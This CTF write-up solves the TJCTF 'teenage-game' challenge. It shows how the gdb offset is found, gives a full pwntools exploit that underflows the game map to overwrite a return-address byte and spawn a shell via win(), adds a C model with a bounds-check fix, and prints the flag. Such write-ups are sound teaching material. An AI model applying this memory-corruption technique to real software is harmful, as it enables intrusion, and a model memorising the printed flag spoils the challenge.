teenage-game

Last updated 1 year ago

Problem

Description

give me a string, any string!

nc tjc.tf 31764

Solution

This challenge is essentially babygame02 from picoCTF 2023 with a few new features and a nicer experience when actually playing the game. The exploit, however, is exactly the same, and other people have explained it better than I can, so refer to ry4n's babygame02 writeup (https://blog.ry4n.org/babygame02-picoctf-writeup-6bf57b54f7b3) for the full in-depth explanation of what we're about to do.

What I will cover here is how to determine the offset between our player tile and the saved return address (RIP). Boot up gdb, move the player tile to coordinate (0, 0), and hit Ctrl+C to inspect the stack layout.

We see that our player tile sits at 0x7fffffffd2b0 and the saved return address into main at 0x7fffffffd298. The absolute addresses change from run to run because the stack is randomized, but the distance between the two is fixed, so we can calculate it to know how many cells to move:

0x7fffffffd2b0 - 0x7fffffffd298 = 0x18 = 24

Thus 24 is our offset. Note that the exploit overwrites only a single byte of the return address (0xe4, the lowest byte of win()), so it depends on the original return address and win() agreeing on every higher byte; confirm that in gdb (compare the saved return value with the address of win) before relying on it.

exploit.py
#!/usr/bin/env python3
from pwn import *

# =========================================================
#                          SETUP
# =========================================================
exe = './game'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'info'
host = 'tjc.tf'
port = 31119   # the challenge description above lists 31764

def start(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
break *win
'''

# =========================================================
#                         EXPLOITS
# =========================================================
# reference: https://blog.ry4n.org/babygame02-picoctf-writeup-6bf57b54f7b3
io = start()

# 'l' lets us choose the player tile; use the last byte of win() (0xe4),
# since only that one byte of the saved return address gets overwritten
io.send(b'l')
io.send(b'\xe4')

# walk from the starting cell to coordinate (0, 0)
for i in range(4):
    io.send(b'w')
    io.send(b'a')

# underflow the map: one row up, 24 columns left, then one row down,
# so the final tile write lands exactly on the saved return address
io.send(b'w')
for i in range(24):
    io.send(b'a')
io.send(b's')

# win() gives us a shell
io.interactive()
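To make the offset arithmetic concrete, here is an added example in C, written for this page rather than taken from the writeup or the challenge's source: a constructed model of the unchecked map write a babygame-style move routine performs, a bounds-checked version beside it, and a replay of the exact key sequence exploit.py sends. The 30x90 grid, the (4, 4) starting cell, the single-byte patch check and the constructed addresses 0x401290 and 0x4012e4 are assumptions for illustration; only the move keys, the 24-cell distance and the two gdb stack addresses come from the text above.

```c
/*
 * Constructed model of the map-underflow primitive behind teenage-game /
 * babygame02. This is an added example, not the challenge's source: the grid
 * size, the start cell and the sample addresses below are assumptions.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAP_H 30   /* assumed grid size; the real binary's may differ */
#define MAP_W 90

/* The key sequence exploit.py sends after picking the tile:
 * (4,4) -> (0,0), one row up, 24 columns left, one row down. */
static const char EXPLOIT_PATH[] =
    "wawawawa" "w" "aaaa" "aaaa" "aaaa" "aaaa" "aaaa" "aaaa" "s";

/* Flat byte offset from map[0][0] that a tile write for (row, col) lands on.
 * The vulnerable game never range-checks, so negative coordinates index
 * below the map buffer, into whatever else lives on the stack there. */
static long cell_offset(int row, int col)
{
    return (long)row * MAP_W + col;
}

/* Unchecked move, as the vulnerable game behaves: every key is accepted. */
static void move_unchecked(int *row, int *col, char key)
{
    switch (key) {
    case 'w': (*row)--; break;
    case 's': (*row)++; break;
    case 'a': (*col)--; break;
    case 'd': (*col)++; break;
    default:  break;            /* other keys do not move the player */
    }
}

/* Hardened move: refuse any step that would leave the grid and leave the
 * position untouched, so no write can ever reach outside map[][]. */
static bool move_checked(int *row, int *col, char key)
{
    int r = *row, c = *col;
    move_unchecked(&r, &c, key);
    if (r < 0 || r >= MAP_H || c < 0 || c >= MAP_W)
        return false;
    *row = r;
    *col = c;
    return true;
}

/* Replay a key string against the unchecked model from (row, col) and return
 * the offset of the final write; *min_offset (if non-NULL) receives the lowest
 * offset any intermediate write touched. */
static long replay_unchecked(const char *moves, int row, int col, long *min_offset)
{
    long lo = cell_offset(row, col);
    for (const char *p = moves; *p; p++) {
        move_unchecked(&row, &col, *p);
        long off = cell_offset(row, col);
        if (off < lo)
            lo = off;
    }
    if (min_offset)
        *min_offset = lo;
    return cell_offset(row, col);
}

/* Replay against the hardened model; returns how many moves were rejected. */
static int replay_checked(const char *moves, int row, int col)
{
    int rejected = 0;
    for (const char *p = moves; *p; p++)
        if (!move_checked(&row, &col, *p))
            rejected++;
    return rejected;
}

/* A one-byte overwrite of the saved return address only redirects into win()
 * if the two addresses agree on every byte above the lowest one. */
static bool low_byte_patch_reaches(uint64_t saved_ret, uint64_t win)
{
    return (saved_ret & ~(uint64_t)0xff) == (win & ~(uint64_t)0xff);
}

int main(void)
{
    long lo;
    long final = replay_unchecked(EXPLOIT_PATH, 4, 4, &lo);
    printf("final write at map%+ld (lowest cell touched: map%+ld)\n", final, lo);
    printf("hardened game rejects %d of %zu moves\n",
           replay_checked(EXPLOIT_PATH, 4, 4), strlen(EXPLOIT_PATH));
    /* constructed addresses: same upper bytes, so patching 0xe4 is enough */
    printf("one-byte patch 0x401290 -> 0x4012e4 reaches win: %s\n",
           low_byte_patch_reaches(0x401290, 0x4012e4) ? "yes" : "no");
    return 0;
}
```

Replaying the path shows the final write landing at map-24, which is exactly 0x7fffffffd2b0 - 0x7fffffffd298, while the intermediate writes along row -1 land at map-90 and below, past the return address rather than on the bytes between it and the map. The hardened move routine rejects the 'w' from row 0 and all 24 'a' presses, which is the whole fix: a bounds check before the write removes the out-of-map primitive entirely.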

Flag

tjctf{so_many_new_features_but_who_will_stop_the_underflow?_47c6f204377cb18b30e68da46e9930dc}
